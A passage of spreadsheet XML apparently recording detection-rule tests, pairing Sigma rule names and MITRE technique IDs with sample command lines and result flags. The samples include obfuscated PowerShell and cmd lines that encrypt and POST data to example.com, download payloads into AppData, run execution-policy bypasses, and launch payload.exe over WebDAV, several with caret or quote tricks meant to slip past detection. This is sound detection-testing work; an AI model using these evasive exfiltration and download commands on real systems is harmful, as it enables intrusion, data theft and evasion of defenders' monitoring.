          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim")); $key = "abcdefghijklmnopqrstuvwxyz123456"; $cyphertext = @(); for ($i = 0; $i -lt $plaintext.Count; $i++) { $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length]; }; $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext); Invoke-RestMethod -U""ri example.com -Me""thod POST -B""ody $cyphertext}</t>
        </is>
      </c>
      <c r="F580" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G580" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H580" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I580" s="43" t="n"/>
      <c r="J580" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K580" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B581" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C581" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D581" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E581" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = Get-Content C:\Windows\System32\notepad.exe; [System.Net.HttpWebRequest]::Create("http://127.0.0.1") | % {$_.Method="POST"; $writer = [System.IO.StreamWriter]$_.GetRequestStream(); $writer.Write($content); $writer.Close(); $_.GetResponse().Close()}}</t>
        </is>
      </c>
      <c r="F581" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G581" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H581" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I581" s="43" t="n"/>
      <c r="J581" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K581" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="43" t="n"/>
      <c r="B582" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C582" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D582" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E582" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c p^o^w^e^r^s^h^e^l^l.exe /"nop" -ep bypass -"c" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F582" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G582" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H582" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I582" s="43" t="n"/>
      <c r="J582" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K582" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="43" t="n"/>
      <c r="B583" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C583" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D583" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E583" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C p^o^w^e^r^s^h^e^l^l.exe -"nop" -"ep" bypass -"c" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F583" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G583" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H583" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I583" s="44" t="n"/>
      <c r="J583" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K583" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="43" t="n"/>
      <c r="B584" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C584" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D584" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E584" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -"nop" -Ep bypass -C "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H584" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I584" s="43" t="n"/>
      <c r="J584" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K584" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="43" t="n"/>
      <c r="B585" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C585" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D585" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E585" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C powershell.exe /"nop" -ep bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H585" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I585" s="43" t="n"/>
      <c r="J585" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K585" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="43" t="n"/>
      <c r="B586" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C586" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D586" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E586" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nop /"ep" bypass -c "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F586" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G586" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H586" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I586" s="43" t="n"/>
      <c r="J586" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K586" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="43" t="n"/>
      <c r="B587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C587" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D587" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E587" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C powershell.exe -nop -ep bypass /"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H587" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I587" s="43" t="n"/>
      <c r="J587" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K587" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="43" t="n"/>
      <c r="B588" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C588" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D588" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E588" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nop -"ep" bypass -"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H588" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I588" s="43" t="n"/>
      <c r="J588" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K588" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="43" t="n"/>
      <c r="B589" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C589" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D589" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E589" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c powershell.exe -nOp /"ep" bypass -"c" "Start-Process calc.exe"</t>
        </is>
      </c>
      <c r="F589" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G589" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H589" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I589" s="43" t="n"/>
      <c r="J589" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K589" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="43" t="n"/>
      <c r="B590" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C590" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D590" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E590" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy bypass -"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F590" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G590" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H590" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I590" s="43" t="n"/>
      <c r="J590" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K590" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="43" t="n"/>
      <c r="B591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C591" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D591" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E591" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"nop" -"ep" bypass /"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F591" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G591" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H591" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I591" s="43" t="n"/>
      <c r="J591" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K591" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="n"/>
      <c r="B592" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C592" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D592" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E592" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -"ep" bypass /"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H592" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I592" s="43" t="n"/>
      <c r="J592" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K592" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="43" t="n"/>
      <c r="B593" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C593" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D593" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E593" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile /"ep" bypass -"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H593" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I593" s="43" t="n"/>
      <c r="J593" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K593" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="43" t="n"/>
      <c r="B594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C594" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D594" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E594" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -"ep" bypass -Command "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H594" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I594" s="43" t="n"/>
      <c r="J594" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K594" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="n"/>
      <c r="B595" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C595" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D595" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E595" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -"ep" bypass -C "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H595" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I595" s="43" t="n"/>
      <c r="J595" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K595" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="43" t="n"/>
      <c r="B596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C596" s="44" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D596" s="44" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E596" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop /"ep" bypass -C "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H596" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I596" s="44" t="n"/>
      <c r="J596" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K596" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="44" t="n"/>
      <c r="B597" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C597" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D597" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E597" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H597" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I597" s="44" t="n"/>
      <c r="J597" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K597" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="44" t="n"/>
      <c r="B598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C598" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D598" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E598" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$req = New-Object -ComObject Msxml2.XMLHTTP; $req.open('GET', 'http://example.com/payload', $false); $req.send(); $req.responseText"</t>
        </is>
      </c>
      <c r="F598" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G598" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H598" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I598" s="43" t="n"/>
      <c r="J598" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K598" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="44" t="n"/>
      <c r="B599" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C599" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D599" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E599" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F599" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G599" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H599" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I599" s="43" t="n"/>
      <c r="J599" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K599" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="44" t="n"/>
      <c r="B600" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_web_request_cmd_and_cmdlets</t>
        </is>
      </c>
      <c r="C600" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets</t>
        </is>
      </c>
      <c r="D600" s="44" t="inlineStr">
        <is>
          <t>9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d</t>
        </is>
      </c>
      <c r="E600" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "iwr('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F600" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G600" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H600" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I600" s="43" t="n"/>
      <c r="J600" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K600" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1" s="42">
      <c r="A601" s="44" t="n"/>
      <c r="B601" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C601" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D601" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E601" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process call create "\\192.168.1.50\DavWWWRoot\share\payload.exe"</t>
        </is>
      </c>
      <c r="F601" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G601" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H601" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I601" s="44" t="n"/>
      <c r="J601" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K601" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1" s="42">
      <c r="A602" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C602" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D602" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E602" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F602" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G602" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H602" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I602" s="44" t="n"/>
      <c r="J602" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K602" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1" s="42">
      <c r="A603" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B603" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C603" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D603" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E603" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F603" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G603" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H603" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I603" s="43" t="n"/>
      <c r="J603" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K603" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1" s="42">
      <c r="A604" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B604" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C604" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D604" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E604" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F604" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G604" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H604" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I604" s="44" t="n"/>
      <c r="J604" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K604" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1" s="42">
      <c r="A605" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C605" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D605" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E605" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F605" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G605" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H605" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I605" s="44" t="n"/>
      <c r="J605" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K605" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B606" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C606" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D606" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E606" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F606" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G606" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H606" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I606" s="43" t="n"/>
      <c r="J606" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K606" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C607" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D607" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E607" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H607" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I607" s="43" t="n"/>
      <c r="J607" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K607" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B608" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C608" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D608" s="44" t="inlineStr">
